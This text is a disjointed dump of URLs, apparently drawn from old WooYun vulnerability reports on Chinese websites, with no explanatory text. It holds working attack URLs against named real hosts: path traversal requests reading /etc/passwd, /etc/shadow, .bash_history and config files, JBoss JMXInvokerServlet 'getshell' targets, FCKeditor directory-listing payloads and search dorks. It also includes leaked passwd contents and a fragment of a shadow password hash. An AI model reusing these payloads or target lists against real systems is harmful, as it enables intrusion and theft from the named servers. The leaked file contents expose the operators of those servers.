http://ticket.cits.cn/dest/cpw-tBJA-pa1-p1.html http://ticket.cits.cn/dest/cpw-tBJA-pa1-pt0008.html http://ticket.cits.cn/dest/cpw-tBJA-pa1-pt0019.html http://ticket.cits.cn/dest/cpw-tBJA-pa1.html 
http://ticket.cits.cn/dest/cpw-tBJA-pa2-pt0008.html http://mintrust.minmetals.com.cn/wkxtweb/product/netWorthShow?product.id=11F7AF8D260D44C5B7D08EA9D2ED59BF9988 http://124.42.59.103:8080/presale/logon.do http://124.42.59.103:8080/invoker/JMXInvokerServlet,getshell http://w.189.cn/ http://m.sobeycloud.com/APIServiceReceiver?siteId=37&method=getAdvertisement&type=banner clsid:23A860E9-0C41-4E01-9206-D3FC0E413645 http://www.gotohuawei.com/admin/Runtime/Logs/ RunTime:0.000803s http://61.146.213.192/gdczsam/index.jsp http://210.76.65.208:7001/gdczsam/index.jsp http://61.145.75.123:8000/gdczsam/index.jsp http://218.16.249.227:7001/gdczsam/index.jsp http://218.16.249.227:7001/gdczsam/index.jsp http://121.11.76.118:9090/gdczsam/index.jsp http://www.aizhenghun.com/ http://202.84.17.254/upload/uploadPlace.do?method=getDepartment&fatherId=gnfs http://hr.chinatelecom-ec.com.cn http://hr.chinatelecom-ec.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://hr.chinatelecom-ec.com.cn/UserFiles/File/ctsi.jsp http://www.mao10.com http://www.mao10.com/post-group-single-id-283.html http://xxs.la/r3TBKf http://jobs.ch.com http://60.172.2.211:8081/ http://www.fyzcgl.com/ http://218.22.115.165:8011/ http://www.fyyqqgz.com/ http://zcgl.yscz.gov.cn:8001/default.aspx http://220.180.150.228/ http://www.lqzcgl.com/ http://218.22.114.166:8011/default.aspx http://www.fyzcgl.com/fygx/ http://zc100.com/ http://www.fnzcgl.com/ http://zc.mas.gov.cn:8080/ http://zc.yyxcz.gov.cn:81/ http://www.wooyun.org/bugs/wooyun-2015-0110745/ https://219.134.131.240/report/Action/delAllChoice.php?delID=1*|a&type=accessUpperSet https://125.93.31.253/ucenter/main/zkxy.php?CommonFlag=S&gModuleId=sjjk&gProgramId=1cmsgmanage&gUpd=R&id=1 https://125.93.31.253/ucenter/ https://60.223.226.154/ucenter/ https://110.65.138.9/ucenter/ https://218.108.62.254/ucenter/ https://220.165.220.62/ucenter/ http://ses.gdqts.gov.cn:8091/gdtsout/jsp/dealLogin.jsp?j_username= 
http://114.112.93.215:50070/ http://auto.qq.com/a/20131230/013010.htm https://github.com/tecshuttle/car/blob/40247b966a8b47692343be4a6d04030bc2ccb207/application/config/production/database.php http://leshi.wy-fund.com:80/ http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080102 http://homelinktc.sinaapp.com/ http://homelinktc.sinaapp.com:80/s.php http://homelinktc.sinaapp.com:80/s1.php http://homelinktc.sinaapp.com:80/s2.php http://homelinktc.sinaapp.com:80/s3.php http://homelinktc.sinaapp.com:80/s4.php http://homelinktc.sinaapp.com/admin.php http://rep.fttcc.com/ http://myadm.fttcc.com/ http://www.gxpiao.com/Movie_page1.aspx?dyyid=1 http://www.gxpiao.com/Movie_page2.aspx?dybm=1 http://hotel.cits.cn/hotel/detail/1410.html?&city_id=70082 http://travel.chinadaily.com.cn/trip/city/id/20/cate/* https://github.com/z306223558/TedoInformantion/blob/29c8f15e67970aa798086639a34d6e239f32916f/Api/TestUser/Conf/config.php https://zabbix.hichao.com/zabbix/ http://sl.zhuna.cn/order/cancel_order/?orderid=150615820 http://leshi.wy-fund.com/api.php?fundId=000008&date1=20150401&date2=20150401&amount=100000 http://langdu.jlu.edu.cn/poetry/playAction.action http://you.ctrip.com/ajaxnew/GetUserCate.ashx?callback=a&_=1430122802406 http://partner.zhongkuai.com/ http://e.lvmama.com http://ebooking.lvmama.com/vst_ebooking/adminlogin.do http://17500.cn:80/p3/p3allresult.php http://17500.cn/3d/3Dallresult.php http://17500.cn/3d/info4488.php http://17500.cn/p3/info4488.php http://sms.chengduair.cc/.svn/entries http://wooyun.org/bugs/wooyun-2015-0110567 http://www.js808.cn/ www.js808.cn http://**.**.**/statisticsweb/userLogin.action http://wsyj.zjwst.gov.cn/XT_Login/ http://122.112.16.208:8080/back/main.jsp http://sope.ruc.edu.cn/www.rar http://123.138.17.36:8080/slsdjt/login.jsp http://123.138.17.36:8080/invoker/JMXInvokerServlet http://123.138.17.36:8080/jmxconsole/, http://115.182.70.243/api_list/ http://115.182.70.243/item/get_detail/?id=7090415575480086581 
http://**.**.**/video/ http://www.dianyisheji.com/ http://www.gxcjcy.com/dianyi/index.php?action=login http://gxdawang.com/dianyi/index.php?action=login http://www.fpg1919.com/dianyi/index.php?action=login http://gxpcjz.com/dianyi/index.php?action=login http://gxmingjia.com/dianyi/index.php?action=admin&op=login http://ss-hearing.com/dianyi/index.php?action=admin&op=login http://www.gxruiyi.com/dianyi/index.php?action=admin&op=login http://gxymzs.com/dianyi/index.php?action=admin&op=login http://www.17500.cn/tools/qushiajax.php http://123.138.17.36:8080/slsdjt/sys/Login_dologin.action http://123.138.17.36:8080/slsdjt/sys/Login_dologin.action http://123.138.17.36:8080/slsdjt/sys/Login_dologin.action http://cda.data.chinacache.com/phpinfo.php http://220.181.65.245:88/data/cache2/svn/public/cda/ca/script http://192.168.1.1/xdslcfg.html http://192.168.1.1/ctwancfg.html http://192.168.1.1/ctdhcp.html http://192.168.1.1/cttr69cfg.html http://LNRMS.chinaunicom.com:9090/RMS-server/RMS http://192.168.1.1/ctadminpswd.html http://192.168.1.1/resetrouter.html http://192.168.1.1/defaultsettings.html http://192.168.1.1/backupsettings.conf http://95c.com.cn/ http://cj.haut.edu.cn/zyjs/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=1 http://www.bgits.com.cn/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=1 http://www.zdiad.com.cn/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=2 http://www.cranewhcz.com/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=2 http://www.bjdfsd.cn/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=2 http://www.langyuhb.com/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=4 http://www.95590.cn/ebiz/view/renewal/vehicleRenewalInsuranceCalculateSkin.jsp?chanceId=13533143 http://www.rqbao.com:80/member/setNewPassword?email=MTUxNDQxMzkyOEBxcS5jb20= http://www.rqbao.com:80/member/setNewPassword?email=MTUxNDQxMzkyOEBxcS5jb20= 
http://www.duba.com/zt/questionnaire/index.php?c=index&a=index http://www.duba.com/nav.php?c=pic&a=download&file=Li4vaW5kZXgucGhw http://www.duba.com/nav.php?c=pic&a=download&file= http://ffp.xiamenair.com/web.zip http://wooyun.org/bugs/wooyun-2014-072384 http://down.chinaz.com/soft/33301.htm inurl:class_detail.asp?id= http://www.gcdbyey.cn/class_detail.asp?id=164 http://www.pd-goodbaby.com/class_detail.asp?id=124 http://www.fzejx.com/class_detail.asp?id=153 http://myszfy.scsyyey.net/class_detail.asp?id=127 http://www.lrbly.com/class_detail.asp?id=121 http://logs.zhuna.cn/ts.php http://hotelwsqq.vip.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL http://finder.unking.cn/BackupSmsSucc http://finder.unking.cn/GetRestoreUrl http://www.unking.cn/zhaobang/backlog/00/00/560/32/2/sms/1430154035800-local-7.asp","curl":"http://www.unking.cn/zhaobang/backlog/00/00/560/32/2/20150428124734125-local-1.zip","returncode":"10000 http://vipcenter.lenovo.com.cn/.svn/ http://vipcenter.lenovo.com.cn/htaccess.txt http://vipcenter.lenovo.com.cn/admin/includes/ http://vipcenter.lenovo.com.cn/admin/help/ http://vipcenter.lenovo.com.cn/admin/images/ http://vipcenter.lenovo.com.cn/admin/js/ http://vipcenter.lenovo.com.cn/api/ http://vipcenter.lenovo.com.cn/images/ http://vipcenter.lenovo.com.cn/includes/ http://vipcenter.lenovo.com.cn/includes/fckeditor/ http://vipcenter.lenovo.com.cn/pma/setup site:www.99bill.com http://bbs.union.zhuna.cn/install/include/install_2011.php http://**.**.**/index.shtml http://**.**.**/dwbm_bminfoshow.dobmid=800 http://61.139.105.105:8008/R9iPortal/cm/cm_function_save.jsp?gnid=1&checked=1 http://61.139.105.105:8008/R9iPortal/cm/cm_function_save.jsp?gnid=1&checked=1 http://61.139.105.105:8008 http://124.128.96.98:8001 http://web72283.5udns.cn http://210.41.128.120:8002 http://www.jmsxc.com:7001 http://124.128.96.98:8001/UpdateNoticeRtnInfoInc?info_id=1&urid=2 http://124.128.96.98:8001/UpdateNoticeRtnInfoInc?info_id=1&urid=2 
http://61.139.105.105:8008 http://124.128.96.98:8001 http://web72283.5udns.cn http://210.41.128.120:8002 http://www.jmsxc.com:7001 http://topic.xcar.com.cn/201503/new_crown/ http://cms.53cms.com http://cms.53cms.com/cms/53cms/Company.asp?id=2 http://cms.53cms.com/cms/53cms/NewsView.asp?id=39 http://cms.53cms.com/cms/53cms/ProductsView.asp?id=81 http://cms.53cms.com/cms/53cms/DownFileView.asp?id=7 http://cms.53cms.com/cms/53cms/ProductsListA.asp?id=36 http://122.228.236.107:8080/ http://122.228.236.107:8080/jmx-console/ http://122.228.236.107:8080/invoker/JMXInvokerServlet http://www.chinacreator.com/ http://www.hnagri.gov.cn/cms/voteManager/voteaction.jsp http://www.hnrm.gov.cn/cms/voteManager/voteaction.jsp http://www.hn408.org/cms/voteManager/voteaction.jsp http://www.hnsyczj.gov.cn/cms/voteManager/voteaction.jsp http://www.hunangtzy.com/cms/voteManager/voteaction.jsp http://119.254.70.76 http://hi.mop.com/user/profile/sendActiveEmail http://www.cnshipping.com.hk/liulc/kgwz/xxzx.asp?type_id=3&title=%B9%AB%CB%BE%B6%AF%CC%AC&nclass_id=656 http://api.airmacau.com.mo/news/vnews_en.asp?id=A00054 http://maths.cumt.edu.cn/math/admin/admin!login.action http://www.sh-shipping.com/new/xw_gsxw_show.asp?Id=2735 http://www.sh-shipping.com/new/search.asp?types=1&keyword=a http://www.aizhenghun.com http://zhaopin.cnpc.com.cn:80 zhaopin.cnpc.com.cn/upload/ zhaopin.cnpc.com.cn/logs/ zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyEducation.htm?selectId=a844e84cd3744a7e85a33d1de33c8e24&ismaxEducation=1&ismaxDegree=1&isfirstEducation=1&maxEducationid=a844e84cd3744a7e85a33d1de33c8e24&firstEducationid=a844e84cd3744a7e85a33d1de33c8e24 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyCoumunication.htm?selectId=becfb18163f5499aae73ae3eecd43390&hiddenId=becfb18163f5499aae73ae3eecd43390 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyJobHistory.htm?selectId=f3eed44eaee547d89df1ea2123894099 
zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyRewardHistory.htm?selectId=413d78e11f474e7a9049e8b1921128c9 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyRelativesInfo.htm?selectId=ed1c1febd4a24237bdf0db81f542e9ec zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyGoResumeOther.htm?selectId=c1bd1260936d4937ab98662b82466787 zhaopin.cnpc.com.cn/CNCPRecruitmentWeb/resume/goModifyJobHistory.htm?selectId=6572 IP:223.203.209.104:6379 http://122.228.236.107:8080/ http://122.228.236.107:8080/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://122.228.236.107:8080/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://122.228.236.107:8080/editor/filemanager/browser/default/connectors/jsp/connector http://www.08cms.com/ http://www.433100fcw.com/info.php?fid=1&tblprefix=cms_msession http://www.539f.net/info.php?fid=1&tblprefix=cms_msession http://www.gogolz.com/info.php?fid=1&tblprefix=cms_msession http://www.csgfw.cn/info.php?fid=1&tblprefix=cms_msession http://www.pxmfw.com/info.php?fid=1&tblprefix=cms_msession http://gamesvr.kuwo.cn/ http://fw.rrs.com/snaplb/Wiki/Search/list?pageNum=1&pageSize=10&moduleId=2 http://125.64.43.152:8080/login.action http://58.20.108.8:8081/login.action http://60.191.176.146:8080/login.action http://58.49.56.113:8080/login.action http://42.202.133.61:8080/login.action http://218.65.134.26:8080/login.action http://jewelrydesign.aili.com/?a=work&id=1&imgid=2138&m=archives http://jewelrydesign.aili.com/?a=index&m=member&word=l http://jewelrydesign.aili.com/?a=serach&m=archives&title=Mr.&type=2 http://yse.com.cn/news_detail.php?id=97 http://www.svnchina.com/project_ac.php?term= http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://www.zugame.com/News/news_show.aspx?id=211&cid=1 
http://www.zugame.com/News/news_show.aspx?id=211&cid=1 http://fw.rrs.com/snaplb/profile/getOthersTopicList?userId=lijian0355¤tPage=1 http://fw.rrs.com/snaplb/Wiki/Detail/list?wikiId=3db8957b-9d0e-4cc6-a130-db78bd6bc7e1 http://fw.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=e1c9355f-f613-47d6-9d1f-3da59fa39e83%20&pageNum=0 http://pos.aokang.com:20000/bpos/getUserInfoJSON.jsp?storeids=select%20a.C_STORE_ID%20from%20users http://**.**.**/Index/login http://huodong.homelink.com.cn/xinfang/seckill.php?cid=24 http://**.**.**/dsmrm/ http://fuwu.rrs.com/snaplb/profile/getOthersTopicList?userId=%E6%B5%B7%E5%B0%94%E5%8C%97%E4%BA%AC%E5%88%86%E4%B8%AD%E5%BF%83¤tPage=1 http://219.143.192.52 http://fuwu.rrs.com/snaplb/Wiki/Detail/list?wikiId=049f1c19-dfa8-4564-898b-d8cc63113e1c id:109554,我和该漏洞提出的问题是不相同的,我指出的是fck编辑器的问题,上传点和漏洞id:109554的完全不同,并且我提出的是fck任意文件遍历问题,也和其任意文件下载不同。 http://219.131.221.59:8080/ http://219.131.221.59:8080/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://115.182.44.211/index.php/site/login coding:utf-8-*- http://www.cthhmu.com/about/index.php?id=1 http://fuwu.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=40e474d2-cce9-4c14-bc47-8c248351b0ce&pageNum=0 http://222.178.89.21:8080/oa/ http://222.178.89.21:8080/jmx-consoleing/ http://www.17u.net/WDHandler/MemberAjaxHandler.ashx http://222.178.89.21:8080/oa/login/login/login.action http://222.178.89.21:8080/oa/login/login/login.action http://222.178.89.21:8080/oa/login/login/login.action jar:/yusr/java/jdk1.6.0_21/lib/tools.jar http://qdgl.cttha.com/,来到中国移动某省铁通无线固话经营分析系统页面,如图所示: http://sheji.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=eeed8708-7d64-4059-b79c-f0b3eea2236c%20&pageNum=0 http://219.143.192.122/citsres/.svn/entries http://sheji.rrs.com/snaplb/profile/getOthersTopicList?userId=%E5%B8%83%E6%9E%9700¤tPage=6 
http://huxing.rrs.com/snaplb/experienceshare/evaluate/anon/comment/init?id=559a0283-b2d4-4481-b24d-341953f3f0e6%20&pageNum=0 http://huxing.rrs.com/snaplb/Wiki/Detail/list?wikiId=54919fbe-3a50-4346-a9ca-1098acb6e26e http://112.65.142.28/HTlogin.aspx http://112.65.142.28:80/bbs/admin_login.asp http://ask.unitymanual.com/publish/ http://ask.unitymanual.com/ http://laibin.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://wz.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://qz.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://gl.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://lz.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://zq.666gps.com/JP/PublicServices/gdjp/Article.aspx?id=3 http://topic.xcar.com.cn/TOKYO/ http://pams.jj-inn.com:8080/jinjiang.web/index.htm http://119.6.98.100:18081/emp/selfOpenAccountAction!preAddZRR.action http://tokyotw.brandoff.tw:80/ http://222.223.191.178 http://xiaoxi.daoyoudao.com/user/login_login.do http://sqlmap.org http://42.159.157.226/ http://erp.touna.cn:9090/logout.action http://acc.rxdai.com:8585/EmployeeQuery/Login.aspx http://222.128.7.115:8090/borrowapply/ http://huati.rrs.com/snaplb/profile/getOthersTopicList?userId=18208299979¤tPage=1 www.zjzfcg.gov.cn http://www.zjzfcg.gov.cn/DownloadServlet?fileName=GP_PROJ_ZBWJ/1238119231178.doc&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/passwd&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/shadow&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../root/.bash_history&fileShowName http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../..//home/weblogic/bea/user_projects/domains/webcluster/applications/webapp/WEB-INF/web.xml&fileShowName 
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../../home/apache-tomcat-5.5.33/webapps/new/WEB-INF/classes/jdbc.properties&fileShowName http://yeyou.mop.com/payment/yee_mobile.aspx?co http://sqlmap.org http://sl.zhuna.cn/ http://mall.jinjiang.com/ http://218.83.246.26:8080/WebOA/ http://218.83.246.26:8080/jmx-console/ http://my.51job.com http://www.fjgtzy.gov.cn:81/gxmh/login.aspx http://219.238.6.204:8080/tulip/login.do http://bridge.tongji.edu.cn/lpt3.xcc.asp http://dgyj.tongji.edu.cn/FCKeditor/editor/filemanager/connectors/test.html# http://stru-en.tongji.edu.cn/manage/login.asp http://mat.tongji.edu.cn/bbs/admin_login.asp http://zyxw.tongji.edu.cn/TJPDSYS/InfoDetail.jsp?titleID=555 http://www.zhaopin.com http://pub.px.gw.com.cn/training/download.jsp?filename=training/download.jsp&name=xxx.txt http://nxyqs.com/newexam/newexam.rar http://**.**.** http://ec.zjs.com.cn/zjs/ http://www.sh.10086.cn/shop/app?service=page/base.OrderBackUpCard&listener=initPage http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号 http://www.hb-eport.gov.cn/show/news.action http://www.hb-eport.gov.cn/show/news.action 
jar:/eas63/EAServer6/bin/../lib/eas-server-15.jar:/eas63/EAServer6/bin/../lib:/eas63/EAServer6/bin/../ant/lib/ant-launcher.jar:/eas63/EAServer6/bin/../ant/lib/ant.jar:/eas63/Shared/jdk1.6.0_12/lib/tools.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/sslplus_nio.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/sslplus_jdk15.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/sslplus.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/EccpressoJDK15ECC.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/EccpressoFIPSJca.jar:/eas63/EAServer6/bin/../lib/fips/jdk16/EccpressoFIPS.jar:/eas63/EAServer6/bin/../genfiles/java/classes:/eas63/EAServer6/bin/../lib/ext/jTDS3.jar:/eas63/EAServer6/bin/../lib/ext/jconn3.jar:/eas63/EAServer6/bin/../lib/ext/pbjdbc12110.jar:/eas63/EAServer6/bin/../lib/ext/pbjdbc12115.jar http://www.hb-eport.gov.cn/show/news.action http://bs.qwb.sh.gov.cn/qwb_inter/pages/T_QWB_CHIEFMAIL/new_edit.jsp http://jk.qwb.sh.gov.cn/qwb_inter/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ url:https://admin.qwb.sh.gov.cn https://admin.qwb.sh.gov.cn/qwb_inter/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.chinalife.com.cn/jobs/module/resume/reseducationexperience/preUpdateResEducationExperience.do?educationExperienceId=10011 http://www.chinalife.com.cn/jobs/module/resume/reseducationexperience/preUpdateResEducationExperience.do?educationExperienceId=448151 http://219.143.192.77/citsonlineWeb/switchdo.do?prefix=/online&page=/B2BLogin.do,存在sql注入漏洞可跑表进行脱库。 http://183.237.254.45:8080/Login.aspx http://pkunews.pku.edu.cn:8080/hlftiweb/search.jsp www.chinahr.com http://www.chinahr.com http://m.chinahr.com http://www.21meibo.com/?s=/case/info/id/122 http://college.transn.com http://www.njjgc.cn/nsplatform/ http://218.94.68.41:9200/Account/LogOn?ReturnUrl=%2f http://218.94.68.41:9000/jgcWeb/logon.do http://218.94.68.41:9900/jmx-console/ 
http://xdga.scol.com.cn/inqu_hudong.asp?channel=%BE%AF%C3%F1%BB%A5%B6%AF&channelname=jmhd&col=%CD%F8%C9%CF%D7%C9%D1%AF&colname=wszx&c=%BE%D6%B3%A4%D0%C5%CF%E4 http://lebi.17500.cn http://ah.wo.com.cn:80/ah/user/IsNotLogin.htm http://122.224.8.2:8080/ctkj_acl/html/new_login.html http://122.224.8.2:8080/marketing/html/market_manage.html http://122.224.8.2:8080/invoker/JMXInvokerServlet,getshell http://lpsdx.gzst.gov.cn/comimglist.aspx?sid=M06&cid=M06&page=1 http://sfc.gzst.gov.cn/comimglist.aspx?sid=M06&cid=M06&page=1 http://mms.wo.com.cn:80/web.do?method=queryServices&channelId=2.4281106E7 http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mtime:x:500:500::/home/mtime:/bin/bash ntp:x:501:501::/home/ntp:/sbin/nologin zabbix:x:502:502::/home/zabbix:/sbin/nologin http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/hosts http://59.151.32.24/../../../../../../../../../../../../../../../../../etc/shadow zg3lClhHg9U9MWD2eK7oPJiR9gVwI82ELJxq4VWW1Byb2AZtgQl1:16458:0:99999:7 http://59.151.32.24/../../../../../../../../../../../../../../../../../root/.bash_history http://cloudclass.ouchn.edu.cn/phone/media!liveMediaList.action-国家开放大学 http://1job.so/jobsearch/search/?keywords=alert&location=%E6%88%90%E9%83%BD&profile_remember=&profile_work_year=&profile_salary_l=&profile_salary_r= http://1job.so/jobsearch/search/?keywords=alert&location=%E6%88%90%E9%83%BD&profile_remember=&profile_work_year=&profile_salary_l=&profile_salary_r= http://gbxx.whu.edu.cn/XxcxAction.action http://www.shjzzx.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.peijia.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx 
http://www.mhhqyy.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://i.goodo.com.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://218.78.210.210/goodo/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.pjhpedu.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://shinan.hpe.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://bqxx.edu.sh.cn/eduplate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.mhhlyy.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.mlzx.net/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx http://www.shjzzx.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAdd.aspx举例 http://www.shjzzx.com/EduPlate/TradeUnionBlog/TradeUnionPhtoAll.aspx http://www.shjzzx.com/UpLoad/Blog/blog-1_20150411173950.aspx http://www.shjzzx.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.peijia.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://i.goodo.com.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://218.78.210.210/goodo/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.pjhpedu.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.mhhqyy.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://shinan.hpe.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx 
http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://bqxx.edu.sh.cn/eduplate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.mhhlyy.com/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.mlzx.net/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAdd.aspx举例 http://syxx.mhedu.sh.cn/EduPlate/TradeUnionBlog/CompetentPhotoAll.aspx inurl:eduplate/GoodoBlog http://www.shjzzx.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.peijia.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.mhhqyy.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://i.goodo.com.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://218.78.210.210/goodo/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.pjhpedu.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://shinan.hpe.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://bqxx.edu.sh.cn/eduplate/goodoblog/ClassPhtoStuAdd.aspx http://www.mhhlyy.com/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://www.mlzx.net/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx 
